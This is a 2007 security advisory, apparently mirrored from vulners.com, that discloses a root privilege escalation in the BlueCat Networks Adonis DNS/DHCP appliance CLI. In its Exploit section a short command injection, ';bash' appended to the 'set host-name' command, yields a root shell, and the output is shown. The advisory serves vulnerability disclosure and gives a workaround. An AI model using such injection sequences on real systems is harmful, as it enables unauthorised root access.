TS-2007-003-0: BlueCat Networks Adonis CLI root privilege escalation

2007-08-1700:00:00

vulners.com

JSON

Template Security Security Advisory

BlueCat Networks Adonis CLI root privilege escalation

Date: 2007-08-16
Advisory ID: TS-2007-003-0
Vendor: BlueCat Networks, http://www.bluecatnetworks.com/
Revision: 0

Summary
Software Version
Details
Impact
Exploit
Workarounds
Obtaining Patched Software
Credits
Revision History

Summary

Template Security has discovered a root privilege escalation
vulnerability in the BlueCat Networks Adonis DNS/DHCP appliance
which allows the admin user to gain root privilege from the
Command Line Interface (CLI).

Software Version

Adonis version 5.0.2.8 was tested.

Details

The admin account on the Adonis DNS/DHCP appliance provides
access to a CLI that allows an administrator to perform tasks
such as setting the IP address, netmask, system time and system
hostname. By entering a certain command sequence, the
administrator is able to execute a command as root.

Impact

Access to the admin account is the same as root access on the
appliance.

Exploit

Here we use the 'set host-name' CLI command to execute a root
shell:

:adonis&gt;set host-name ;bash
adonis.katter.org
root@adonis:~# id
uid=0&#40;root&#41; gid=0&#40;root&#41; groups=0&#40;root&#41;

NOTE: There may be other command sequences that accomplish the
same result.

Workarounds

Only provide admin account access to administrators that also
have root account access on the appliance.

Obtaining Patched Software

Contact the vendor.

Credits

forloop discovered this vulnerability while enjoying a Tuborg
Gold. forloop is a member of Template Security.

Revision History

2007-08-16: Revision 0 released